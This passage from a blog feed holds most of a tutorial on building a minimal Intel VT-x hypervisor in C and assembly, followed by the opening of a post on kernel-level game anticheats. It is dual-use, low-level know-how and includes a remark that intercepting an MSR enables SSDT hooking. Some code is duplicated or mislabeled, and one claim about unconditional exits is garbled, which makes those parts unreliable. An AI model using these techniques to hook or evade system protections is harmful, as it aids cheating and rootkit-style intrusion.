__vmx_vmwrite(GUEST_SYSENTER_EIP, __readmsr(<span class="hljs-number">0x176</span>));
</code></pre>
<p>For the Host area filling, the content filled in the host area is similar to that filled in the guest area. Note that the gdt table item in the host does not need to fill in all attributes, only the selector. Another point to note is that the host's rsp must use a piece of memory applied for by itself. If you still use the rsp when the guest exits, it will definitely cause the stack in the guest to be destroyed, resulting in unpredictable results. The code for filling the host area is as follows:</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">VmxInitHost</span><span class="hljs-params">(ULONG64 HostEip)</span>
</span>{
    GdtTable gdtTable = { <span class="hljs-number">0</span> };
    AsmGetGdtTable(&amp;gdtTable);
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    ULONG trSelector = AsmReadTR();
    trSelector &amp;= <span class="hljs-number">0xFFF8</span>;
    LARGE_INTEGER trBase = { <span class="hljs-number">0</span> };
    PULONG trItem = (PULONG)(gdtTable.Base + trSelector);

    <span class="hljs-comment">// Read TR</span>
    trBase.LowPart = ((trItem[<span class="hljs-number">0</span>] &gt;&gt; <span class="hljs-number">16</span>) &amp; <span class="hljs-number">0xFFFF</span>) | ((trItem[<span class="hljs-number">1</span>] &amp; <span class="hljs-number">0xFF</span>) &lt;&lt; <span class="hljs-number">16</span>) | ((trItem[<span class="hljs-number">1</span>] &amp; <span class="hljs-number">0xFF000000</span>) &gt;&gt; <span class="hljs-number">8</span>);
    trBase.HighPart = trItem[<span class="hljs-number">2</span>];

    <span class="hljs-comment">// Set TR</span>
    __vmx_vmwrite(HOST_TR_BASE, trBase.QuadPart);
    __vmx_vmwrite(HOST_TR_SELECTOR, trSelector);

    <span class="hljs-comment">// Set segment selectors</span>
    __vmx_vmwrite(HOST_ES_SELECTOR, AsmReadES() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_CS_SELECTOR, AsmReadCS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_SS_SELECTOR, AsmReadSS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_DS_SELECTOR, AsmReadDS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_FS_SELECTOR, AsmReadFS() &amp; <span class="hljs-number">0xfff8</span>);
    __vmx_vmwrite(HOST_GS_SELECTOR, AsmReadGS() &amp; <span class="hljs-number">0xfff8</span>);

    <span class="hljs-comment">// Set control registers</span>
    __vmx_vmwrite(HOST_CR0, __readcr0());
    __vmx_vmwrite(HOST_CR4, __readcr4());
    __vmx_vmwrite(HOST_CR3, __readcr3());

    <span class="hljs-comment">// Set RSP and RIP</span>
    __vmx_vmwrite(HOST_RSP, (ULONG64)pVcpu-&gt;VmxHostStackBase);
    __vmx_vmwrite(HOST_RIP, HostEip);

    <span class="hljs-comment">// Set MSRs</span>
    __vmx_vmwrite(HOST_IA32_PAT, __readmsr(IA32_MSR_PAT));
    __vmx_vmwrite(HOST_IA32_EFER, __readmsr(IA32_MSR_EFER));
    __vmx_vmwrite(HOST_FS_BASE, __readmsr(IA32_FS_BASE));
    __vmx_vmwrite(HOST_GS_BASE, __readmsr(IA32_GS_KERNEL_BASE));
    __vmx_vmwrite(HOST_IA32_SYSENTER_CS, __readmsr(<span class="hljs-number">0x174</span>));
    __vmx_vmwrite(HOST_IA32_SYSENTER_ESP, __readmsr(<span class="hljs-number">0x175</span>));
    __vmx_vmwrite(HOST_IA32_SYSENTER_EIP, __readmsr(<span class="hljs-number">0x176</span>));

    <span class="hljs-comment">// Set GDT and IDT</span>
    GdtTable idtTable;
    __sidt(&amp;idtTable);
    __vmx_vmwrite(HOST_GDTR_BASE, gdtTable.Base);
    __vmx_vmwrite(HOST_IDTR_BASE, idtTable.Base);
}
</code></pre>
<h1 id="heading-vm-entry-controls">VM-Entry Controls</h1>
<p>Then in <a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Chapter 24.8.1 of "Processor Virtualization Technology"</a>, it explains in detail the filling of vm-entry control class fields and their corresponding attributes. During vm-entry, if the CPU detects that these fields have not been correctly filled, it will throw an error and exit.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722310150055/5e821dbc-ecac-4069-b7b1-af5fd29f91b8.png" alt class="image--center mx-auto" /></p>
<p>The <code>VM_ENTRY_CONTROLS</code> field is 32 bits long, with each bit corresponding to a control function. It controls some operations performed by the processor when entering the virtual machine, such as:</p>
<ul>
<li><p>Whether to load dr0~dr7 registers when entering the virtual machine</p>
</li>
<li><p>Whether to enter IA-32e mode when loading</p>
</li>
<li><p>Whether to load <code>IA32_PERF_GLOBAL_CTRL</code>, <code>IA32_PAT</code>, <code>IA32_EFER</code> registers, etc.</p>
</li>
</ul>
<p>The specific role of each bit is shown in Table 3-9 in the book. This book was written quite early, and the CPU may have added some other fields. For details, please refer to the relevant chapters in the Intel white paper.</p>
<p>After examining this table, you'll notice that some positions are fixed to 1, and some are fixed to 0. Some of these positions are not yet used and are reserved for future expansion of functions. These bits may no longer be fixed to 1 or 0 in the future, but used to control newly introduced functions. Therefore, we cannot directly write the bits fixed to 0 or 1. We need to calculate the bits fixed to 0 and 1 according to an algorithm and fill them into the <code>VM_ENTRY_CONTROLS</code> register.</p>
<p>To achieve this we would need to the <code>IA32_VMX_BASIC</code> register and then check its 55th bit if it's 1, use the register with "TRUE" on the right side of the table for all subsequent operations and if it's 0, use the register without "TRUE" on the left side.</p>
<p>In practice, many modern computers use the register with "TRUE". However, for compatibility, it's necessary to check which group of registers should be used each time.</p>
<p>The method of setting fixed bits is described in detail in Section 2.5.5 of the book. The <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> register is a 64-bit register, and the <code>VM_ENTRY_CONTROLS</code> that needs to be set is a 32-bit register.</p>
<p>When a certain bit in the lower 32 bits of <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> is 1, the corresponding bit in the <code>VM_ENTRY_CONTROLS</code> register must be 1. When a certain bit in the upper 32 bits of <code>IA32_MSR_VMX_TRUE_ENTRY_CTLS</code> is 0, the corresponding bit in the <code>VM_ENTRY_CONTROLS</code> register must be 0.</p>
<pre><code class="lang-c"><span class="hljs-function">ULONG64 <span class="hljs-title">VmxAdjustControls</span><span class="hljs-params">(ULONG64 value, ULONG64 msr)</span>
</span>{
    LARGE_INTEGER msrValue;
    msrValue.QuadPart = __readmsr(msr);
    value = (msrValue.LowPart | value) &amp; msrValue.HighPart;
    <span class="hljs-keyword">return</span> value;
}
</code></pre>
<p>When first building the framework, there's no need to process other fields. Only the 9th bit needs to be filled in the custom field to enter IA-32e mode. Other bits can be left unset at the beginning. However, this doesn't mean these bits are unimportant. For example, the 2nd bit specifies whether to load the current dr register when entering the virtual machine. Reasonable use of this function may implement some special debugging functions.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">ConfigureVmEntryControls</span><span class="hljs-params">()</span>
</span>{
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    ULONG64 msr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_ENTRY_CTLS : IA32_MSR_VMX_ENTRY_CTLS;
    ULONG64 entryControls = VmxAdjustControls(<span class="hljs-number">0x200</span>, msr);  <span class="hljs-comment">// 0x200 enables IA-32e mode</span>
    __vmx_vmwrite(VM_ENTRY_CONTROLS, entryControls);
}
</code></pre>
<p>Chapter 3.6.2 of "Processor Virtualization Technology" describes the MSR-load field. These two fields control whether to load the msr register when entering the virtual machine. Here, we don't need to load the msr register when entering the virtual machine because VM exits and entries are frequent. Loading the msr register every time would reduce performance. If we want to intercept or hook the msr register, there are other methods. Therefore, these two fields can be filled with 0.</p>
<p>Then we go to the <code>VM_ENTRY_INTR_INFO_FIELD</code>, which is described in Chapter 3.6.3.1. Its general role is that after filling this field according to certain rules, the corresponding interrupt or exception will be triggered after entering the virtual machine. We don't need to use this function for now. If the highest bit is set to 0, this field is considered invalid. Therefore, this field can be filled with 0 directly. When we need to use this function in the future, we can deal with it accordingly.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">InitializeVmEntrySettings</span><span class="hljs-params">()</span>
</span>{
    ConfigureVmEntryControls();
    __vmx_vmwrite(VM_ENTRY_MSR_LOAD_COUNT, <span class="hljs-number">0</span>);
    __vmx_vmwrite(VM_ENTRY_INTR_INFO_FIELD, <span class="hljs-number">0</span>);
}
</code></pre>
<h1 id="heading-vm-exit-controls">VM-Exit Controls</h1>
<p>The vm-exit control field is very similar to the vm-entry field. It specifies the operations to be performed when exiting the virtual machine. The operations performed during vm-entry and vm-exit can be corresponded. When vm-exit saves the msr register, vm-entry can load the msr register.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722310374543/d4143bcd-42d2-4cfe-bb4d-fdfeb7c632b2.jpeg" alt class="image--center mx-auto" /></p>
<p>In "<a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Section 24.7.1, VM-Exit Controls</a>" describes the filling rules of vm-exit fields. It generally corresponds to the vm-entry filling rules. Two points to note:</p>
<ol>
<li><p>The 15th bit (acknowledge interrupt on exit) specifies whether to read and save the interrupt vector number when exiting due to external interrupts. You can fill in 0 or 1 without affecting the use, but to use this saved information in the future, you can fill it with 1, which won't affect performance.</p>
</li>
<li><p>The 22nd bit has a device similar to a timer. However, many CPUs do not support this function. For compatibility, it's recommended not to use this function.</p>
</li>
</ol>
<p>Then we get to the VM-Execution Control fields, which used to set which events to intercept and which not to intercept.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">InitializeVmExecutionControls</span><span class="hljs-params">()</span>
</span>{
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    ULONG64 pinBasedMsr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_PINBASED_CTLS : IA32_MSR_VMX_PINBASED_CTLS;
    ULONG64 procBasedMsr = ((vmxBasic &gt;&gt; <span class="hljs-number">55</span>) &amp; <span class="hljs-number">1</span>) ? IA32_MSR_VMX_TRUE_PROCBASED_CTLS : IA32_MSR_VMX_PROCBASED_CTLS;

    ULONG64 pinBasedControls = VmxAdjustControls(<span class="hljs-number">0</span>, pinBasedMsr);
    ULONG64 procBasedControls = VmxAdjustControls(<span class="hljs-number">0</span>, procBasedMsr);

    __vmx_vmwrite(PIN_BASED_VM_EXEC_CONTROL, pinBasedControls);
    __vmx_vmwrite(CPU_BASED_VM_EXEC_CONTROL, procBasedControls);
}
</code></pre>
<p>And in the previous VMCS writing process, after a VM exit event occurs and returns to the host, the RIP is set to the address of the VM-exit processing function. This function must save all registers at the beginning and restore them before returning to the virtual machine. Otherwise, if the register contents differ before exiting and after returning to the virtual machine, it will lead to unpredictable results. Therefore, this function must be a naked function written in assembly.</p>
<pre><code class="lang-c">VmExitHandlerAsm PROC
    push r15;
    push r14;
    push r13;
    push r12;
    push r11;
    push r10;
    push r9;
    push r8;
    push rdi;
    push rsi;
    push rbp;
    push rsp;
    push rbx;
    push rdx;
    push rcx;
    push rax;

    mov rcx,rsp;
    sub rsp,<span class="hljs-number">0100</span>h
    call VmxExitHandler
    add rsp,<span class="hljs-number">0100</span>h;

    pop rax;
    pop rcx;
    pop rdx;
    pop rbx;
    pop rsp;
    pop rbp;
    pop rsi;
    pop rdi;
    pop r8;
    pop r9;
    pop r10;
    pop r11;
    pop r12;
    pop r13;
    pop r14;
    pop r15;
    vmresume
    ret
AsmVmxExitHandler endp
</code></pre>
<p>The process is as follows:</p>
<ol>
<li><p>Save all registers</p>
</li>
<li><p>Call a C function (<code>VmExitHandlerC</code>) for detailed event handling</p>
</li>
<li><p>Restore all registers</p>
</li>
<li><p>Resume VM execution using the <code>vmresume</code> instruction</p>
</li>
</ol>
<p>Then we need to figure out the causes of vm-exit are described. It points out the instructions that will unconditionally cause vmexit events. In the virtual machine, executing all instructions except <code>VMFUNC</code> will unconditionally cause <code>VMEXIT</code> events. Additionally, <code>CPUID</code>, <code>GETSEC</code>, <code>INVD</code>, and <code>XSETBV</code> instructions will also unconditionally cause <code>VMEXIT</code> events.</p>
<p>In 24.9.1 Basic VM-Exit Information, you can find the corresponding vmexit information fields in the control area. These include exit reason, instruction length causing the exit, and instruction information. The vm-instruction error field in the read-only fields will be set when a vm instruction fails.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722267706229/0da624e1-b3b9-49be-9666-1a6f30fe0511.png" alt class="image--center mx-auto" /></p>
<p>The exit reason field composition is described in 3.10.1.1. Bits 0-15 indicate the reason for vm exit, and other bits have other indicating functions. We should extract the other bits and only judge the vm exit reason through bits 0-15.</p>
<p>The vmexit event handling function framework includes:</p>
<ol>
<li><p>Getting instruction length, instruction information, EIP ESP</p>
</li>
<li><p>Getting the event code</p>
</li>
<li><p>Handling the event accordingly</p>
</li>
<li><p>Incrementing rip by the instruction length</p>
</li>
<li><p>Writing back rip and rsp and returning to continue execution at the next instruction</p>
</li>
</ol>
<p>Since we don't plan to implement VT nesting, we need to return an error for vmx events in the guest. When starting VT, if an error occurs, CF and ZF are not both 0. Only when the vmx instruction is successfully executed will CF and ZF both be set to 0. To let the virtual machine realize it cannot continue to enter the VT environment, we need to set CF and ZF to 1.</p>
<pre><code class="lang-c"><span class="hljs-comment">// VM Exit Handler</span>
<span class="hljs-function">EXTERN_C VOID <span class="hljs-title">VmxExitHandler</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    ULONG64 reason = <span class="hljs-number">0</span>;
    ULONG64 instLen = <span class="hljs-number">0</span>;
    ULONG64 instinfo = <span class="hljs-number">0</span>;
    ULONG64 mrip = <span class="hljs-number">0</span>;
    ULONG64 mrsp = <span class="hljs-number">0</span>;

    __vmx_vmread(VM_EXIT_REASON, &amp;reason);
    __vmx_vmread(VM_EXIT_INSTRUCTION_LEN, &amp;instLen);
    __vmx_vmread(VMX_INSTRUCTION_INFO, &amp;instinfo);
    __vmx_vmread(GUEST_RIP, &amp;mrip);
    __vmx_vmread(GUEST_RSP, &amp;mrsp);

    reason = reason &amp; <span class="hljs-number">0xFFFF</span>;

    <span class="hljs-keyword">switch</span> (reason)
    {
        <span class="hljs-keyword">case</span> EXIT_REASON_CPUID:
        <span class="hljs-keyword">case</span> EXIT_REASON_GETSEC:
        <span class="hljs-keyword">case</span> EXIT_REASON_INVD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMCALL:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMCLEAR:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMLAUNCH:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMPTRLD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMPTRST:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMREAD:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMRESUME:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMWRITE:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMXOFF:
        <span class="hljs-keyword">case</span> EXIT_REASON_VMXON:
        <span class="hljs-keyword">case</span> EXIT_REASON_MSR_READ:
        <span class="hljs-keyword">case</span> EXIT_REASON_MSR_WRITE:
        <span class="hljs-keyword">case</span> EXIT_REASON_XSETBV:
            <span class="hljs-comment">// Handle these events</span>
            <span class="hljs-keyword">break</span>;
    }

    __vmx_vmwrite(GUEST_RIP, mrip + instLen);
    __vmx_vmwrite(GUEST_RSP, mrsp);
}
</code></pre>
<p>Next off, cpuid will definitely cause vm-exit events. If there's no need to handle specific behaviors of <code>CPUID</code>, you can simply perform a cpuid in the handling function and return the obtained value to the guest. The handling function is in the host environment, so performing cpuid here will not cause repeated vm-exit events.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle CPUID instruction</span>
<span class="hljs-function">VOID <span class="hljs-title">VmxHandlerCpuid</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    <span class="hljs-keyword">if</span> (context-&gt;mRax == <span class="hljs-number">0x8888</span>)
    {
        context-&gt;mRax = <span class="hljs-number">0x11111111</span>;
        context-&gt;mRbx = <span class="hljs-number">0x22222222</span>;
        context-&gt;mRcx = <span class="hljs-number">0x33333333</span>;
        context-&gt;mRdx = <span class="hljs-number">0x44444444</span>;
    }
    <span class="hljs-keyword">else</span>
    {
        <span class="hljs-keyword">int</span> cpuids[<span class="hljs-number">4</span>] = {<span class="hljs-number">0</span>};
        __cpuidex(cpuids, context-&gt;mRax, context-&gt;mRcx);
        context-&gt;mRax = cpuids[<span class="hljs-number">0</span>];
        context-&gt;mRbx = cpuids[<span class="hljs-number">1</span>];
        context-&gt;mRcx = cpuids[<span class="hljs-number">2</span>];
        context-&gt;mRdx = cpuids[<span class="hljs-number">3</span>];
    }
}
</code></pre>
<p>To verify the interception of the cpuid instruction, we can use special values. If the value of rax is <code>0x8888</code>, we set <code>rax</code>, <code>rbx</code>, <code>rcx</code>, <code>rdx</code> to special values.</p>
<p>Next we need to handle vm-exit events caused by <code>getsec</code>, <code>invd</code>, <code>xsetbv</code> because the getsec instruction is generally not called, except when enabling SGX. We don't need it, so we can temporarily not handle it.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle XSETBV instruction</span>
<span class="hljs-keyword">case</span> EXIT_REASON_XSETBV:
{
    ULONG64 value = MAKE_REG(context-&gt;mRax, context-&gt;mRdx);
    _xsetbv(context-&gt;mRcx, value);
}
<span class="hljs-keyword">break</span>;
</code></pre>
<p>For invd, simply perform an invd instruction in the host environment and return. <code>XSETBV</code> is similar, call <code>XSETBV</code> according to the corresponding rules and return. Note that this instruction is 32-bit compatible, you need to combine <code>eax</code> and <code>edx</code> as the second parameter.</p>
<p>Then we need to figure out the communication between guest and host &amp; Closing VT. We can use any event that produces vmexit for communication between the inside and outside of the virtual machine. We use this feature to implement the function of closing VT. We stipulate that when exiting due to the vmcall instruction, if the current rax is 'abcd', then exit the VT environment.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Set MSR bitmap</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxSetReadMsrBitMap</span><span class="hljs-params">(PUCHAR msrBitMap, ULONG64 msrAddrIndex, BOOLEAN isEnable)</span>
</span>{
    <span class="hljs-keyword">if</span> (msrAddrIndex &gt;= <span class="hljs-number">0xC0000000</span>)
    {
        msrBitMap += <span class="hljs-number">1024</span>;
        msrAddrIndex -= <span class="hljs-number">0xC0000000</span>;
    }
    ULONG64 moveByte = <span class="hljs-number">0</span>;
    ULONG64 setBit = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">if</span> (msrAddrIndex != <span class="hljs-number">0</span>)
    {
        moveByte = msrAddrIndex / <span class="hljs-number">8</span>;
        setBit = msrAddrIndex % <span class="hljs-number">8</span>;
        msrBitMap += moveByte;
    }
    <span class="hljs-keyword">if</span> (isEnable)
    {
        *msrBitMap |= <span class="hljs-number">1</span> &lt;&lt; setBit;
    }
    <span class="hljs-keyword">else</span>
    {
        *msrBitMap &amp;= ~(<span class="hljs-number">1</span> &lt;&lt; setBit);
    }
    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<p>After closing VT, we still need to jump back to the next instruction after the vmcall instruction to continue execution. We need to directly modify <code>rsp</code> and <code>rip</code> to jump back through assembly.</p>
<h1 id="heading-conditional-virtual-machine-exit-events">Conditional Virtual Machine Exit Events</h1>
<p>There are certain control fields that can cause vmexit events when executing certain instructions or reading and writing certain registers, thus we need to create special conditions and handlers for these vmexits.</p>
<p>If the 28th bit of this register is 1, it indicates that MSR bitmap will be started. When the Use MSR bitmap bit is 1, you can provide a physical address of an MSR bitmap area for the <code>MSR_BITMAP</code> field. After filling it according to certain rules, reading and writing corresponding registers will produce conditional vm-exit events.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Set MSR bitmap</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxSetReadMsrBitMap</span><span class="hljs-params">(PUCHAR msrBitMap, ULONG64 msrAddrIndex, BOOLEAN isEnable)</span>
</span>{
    <span class="hljs-keyword">if</span> (msrAddrIndex &gt;= <span class="hljs-number">0xC0000000</span>)
    {
        msrBitMap += <span class="hljs-number">1024</span>;
        msrAddrIndex -= <span class="hljs-number">0xC0000000</span>;
    }
    ULONG64 moveByte = <span class="hljs-number">0</span>;
    ULONG64 setBit = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">if</span> (msrAddrIndex != <span class="hljs-number">0</span>)
    {
        moveByte = msrAddrIndex / <span class="hljs-number">8</span>;
        setBit = msrAddrIndex % <span class="hljs-number">8</span>;
        msrBitMap += moveByte;
    }
    <span class="hljs-keyword">if</span> (isEnable)
    {
        *msrBitMap |= <span class="hljs-number">1</span> &lt;&lt; setBit;
    }
    <span class="hljs-keyword">else</span>
    {
        *msrBitMap &amp;= ~(<span class="hljs-number">1</span> &lt;&lt; setBit);
    }
    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<p>The MSR bitmap area is 4KB in size, divided into four 1KB sections controlling read and write access to different ranges of MSR registers. The setting of MSR bitmap is relatively simple, just set the bit you want to intercept to 1. Additionally, you can perform SSDT hook by intercepting <code>c0000082</code>. However, this method has poor compatibility.</p>
<p>Then to make VT support Windows 10, the <code>RDTSCP</code> instruction needs to be handled. If not handled, it will cause a system crash due to a #UD exception.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle RDTSCP instruction</span>
<span class="hljs-keyword">case</span> EXIT_REASON_RDTSCP:
{
    <span class="hljs-keyword">int</span> aunx = <span class="hljs-number">0</span>;
    LARGE_INTEGER in = {<span class="hljs-number">0</span>};
    in.QuadPart = __rdtscp(&amp;aunx);
    context-&gt;mRax = in.LowPart;
    context-&gt;mRdx = in.HighPart;
    context-&gt;mRcx = aunx;
}
<span class="hljs-keyword">break</span>;
</code></pre>
<p>We need to handle all instructions that might cause #UD exceptions if not handled. The Secondary Processor-Based VM-Execution Controls field needs to be set to enable interception of these instructions. For the rdtscp instruction, it's an upgraded version of <code>RDTSC</code>, used to obtain the CPU time counter in some newer processors.</p>
<p>For the <code>INVPCID</code> instruction, we need to handle the information saved in registers during vm-exit events and call the <code>_invpcid</code> instruction accordingly.</p>
<pre><code class="lang-c"><span class="hljs-function">VOID <span class="hljs-title">VmxExitInvpcidHandler</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    ULONG64 mrsp = <span class="hljs-number">0</span>;
    ULONG64 instinfo = <span class="hljs-number">0</span>;
    ULONG64 qualification = <span class="hljs-number">0</span>;
    __vmx_vmread(VMX_INSTRUCTION_INFO, &amp;instinfo); <span class="hljs-comment">// Get instruction details</span>
    __vmx_vmread(EXIT_QUALIFICATION, &amp;qualification); <span class="hljs-comment">// Get offset</span>
    __vmx_vmread(GUEST_RSP, &amp;mrsp);
    PINVPCID pinfo = (PINVPCID)&amp;instinfo;
    ULONG64 base = <span class="hljs-number">0</span>;
    ULONG64 index = <span class="hljs-number">0</span>;
    ULONG64 scale = pinfo-&gt;scale ? (<span class="hljs-number">1</span> &lt;&lt; pinfo-&gt;scale) : <span class="hljs-number">0</span>;
    ULONG64 addr = <span class="hljs-number">0</span>;
    ULONG64 regopt = ((PULONG64)context)[pinfo-&gt;regOpt];

    <span class="hljs-keyword">if</span> (!pinfo-&gt;baseInvaild)
    {
        <span class="hljs-keyword">if</span> (pinfo-&gt;base == <span class="hljs-number">4</span>)
        {
            base = mrsp;
        }
        <span class="hljs-keyword">else</span>
        {
            base = ((PULONG64)context)[pinfo-&gt;base];
        }
    }

    <span class="hljs-keyword">if</span> (!pinfo-&gt;indexInvaild)
    {
        <span class="hljs-keyword">if</span> (pinfo-&gt;index == <span class="hljs-number">4</span>)
        {
            index = mrsp;
        }
        <span class="hljs-keyword">else</span>
        {
            index = ((PULONG64)context)[pinfo-&gt;index];
        }
    }

    <span class="hljs-keyword">if</span> (pinfo-&gt;addrssSize == <span class="hljs-number">0</span>)
    {
        addr = *(PSHORT)(base + index * scale + qualification);
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (pinfo-&gt;addrssSize == <span class="hljs-number">1</span>)
    {
        addr = *(PULONG)(base + index * scale + qualification);
    }
    <span class="hljs-keyword">else</span>
    {
        addr = *(PULONG64)(base + index * scale + qualification);
    }

    _invpcid(regopt, &amp;addr);
}
</code></pre>
<p>The <code>XSAVES</code> instruction also needs to be considered, which is used for saving processor extended states. The behavior of <code>XSAVES</code> is determined by the "enable <code>XSAVES</code>/<code>XRSTORS</code>" VM-execution control bit. If this control is not set (i.e., is 0), <code>XSAVES</code> will cause an invalid-opcode exception (#UD), potentially crashing the system.</p>
<p>When the control is set to 1, the behavior depends on the XSS-exiting bitmap. <code>XSAVES</code> will cause a VM exit if any bit is set in the logical-AND of <code>EDX:EAX</code>, the <code>IA32_XSS MSR</code>, and the XSS-exiting bitmap. Otherwise, it operates normally.</p>
<p>To properly support <code>XSAVES</code> without unnecessary performance overhead, we need to enable it in the VM-execution controls but avoid setting the XSS-exiting bitmap. This approach prevents the #UD exception and allows <code>XSAVES</code> to operate normally without causing VM exits.</p>
<pre><code class="lang-c"><span class="hljs-function">cCopyvoid <span class="hljs-title">EnableXsavesSupport</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>{
    ULONG64 secondaryControls = <span class="hljs-number">0</span>;

    <span class="hljs-comment">// Read current secondary processor-based VM-execution controls</span>
    __vmx_vmread(SECONDARY_VM_EXEC_CONTROL, &amp;secondaryControls);

    <span class="hljs-comment">// Set the XSAVES enable bit</span>
    secondaryControls |= SECONDARY_EXEC_XSAVES;

    <span class="hljs-comment">// Write back the updated controls</span>
    __vmx_vmwrite(SECONDARY_VM_EXEC_CONTROL, secondaryControls);

    <span class="hljs-comment">// Ensure XSS-exiting bitmap is not set</span>
    ULONG64 xssExitingBitmap = <span class="hljs-number">0</span>;
    __vmx_vmwrite(XSS_EXITING_BITMAP, xssExitingBitmap);
}
</code></pre>
<p>This function does two key things:</p>
<ol>
<li><p>It enables <code>XSAVES</code> support by setting the <code>SECONDARY_EXEC_XSAVES</code> bit in the secondary processor-based VM-execution controls.</p>
</li>
<li><p>It ensures the XSS-exiting bitmap is cleared, preventing unnecessary VM exits when <code>XSAVES</code> is executed.</p>
</li>
</ol>
<p>By implementing this support, we allow the guest OS (such as the Windows kernel) to use the <code>XSAVES</code> instruction without causing VM exits or exceptions. This maintains both functionality and performance in our virtualized environment.</p>
<p>It's worth noting that this approach differs from how we handle some other instructions like <code>RDTSCP</code> or <code>INVPCID</code>, where we might intentionally cause VM exits to emulate or monitor the instruction's behavior. For <code>XSAVES</code>, our goal is to allow it to execute normally within the guest, intervening as little as possible to maintain optimal performance.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>This article has covered the essential steps and concepts needed to implement a basic hypervisor using Intel VT-x virtualization technology. We've explored the process of verifying CPU support, initializing the virtual machine environment, configuring the Virtual Machine Control Structure (VMCS), and handling VM entry and exit events. The implementation of a simple hypervisor as described here provides a foundation for understanding the core mechanics of hardware-assisted virtualization.</p>
<p>There are many additional aspects that need to be addressed to create a robust and feature-complete hypervisor. These include implementing memory virtualization through Extended Page Tables (EPT), virtualizing I/O devices, handling interrupts and exceptions in the guest environment, and implementing nested virtualization support. Additionally, performance optimization, security hardening, and support for multiple guest operating systems are crucial considerations for a production-ready hypervisor.</p>
]]></content:encoded></item><item><title><![CDATA[Understanding Kernel-Level Anticheats in Online Games]]></title><description><![CDATA[Cover Illustration by atomic_arctic

This research was done using software obtained by myself individually or through open-source projects abiding to all licenses. There is no intention of harming any company’s product.
This post is not meant to be a...]]></description><link>https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games</link><guid isPermaLink="true">https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 21 Jul 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1720021643202/d0e233b5-aaa2-4ae3-a366-6ff6bf6893d7.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by atomic_arctic</em></strong></p>
<hr />
<p><strong>This research was done using software obtained by myself individually or through open-source projects abiding to all licenses.</strong> There is no intention of harming any company’s product.</p>
<p>This post is not meant to be an attack towards <strong>any game or anticheat developer</strong>, and I am not tied to any game hack publisher or entities.</p>
<p>Everything here is constructed for educational purposes.</p>
<hr />
</blockquote>
<p>I've talked somewhat briefly about my previous adventures being a cheat developer for various competitive games during highschool. I've learned alot through those endeavors and i've been applying the skills i've learned there at my work ever since. But since i've gotten out of the game, anticheat systems have grown considerably more aggressive and the backlash against them is getting more intense.</p>
<p>On one side, developers say that kernel-level anticheat drivers are no more invasive than antivirus/EDR software. But consumers have also take notice about how its kinda absurd that to enjoy a game, they have to install something akin to spyware in their devices. While i do agree with some points lounged by both sides, i think there is a conversation to be had about the need for these drivers.</p>
<p>On one hand, cheating software has moved forward from the days of scrappy kids in UnknownCheats to a <a target="_blank" href="https://www.i3d.net/understand-cheat-developers-defeating-tactics/">massive industry</a>, with many making <a target="_blank" href="https://diablo3story.blogspot.com/2014/07/a-diablo-3-story.html">six figure incomes</a> from building cheating software. But there are also alot of cases where <a target="_blank" href="https://research.meekolab.com/analyzing-genshin-impacts-anticheat-module">anticheat drivers</a> have been used for offensive purposes through LOLBins.</p>
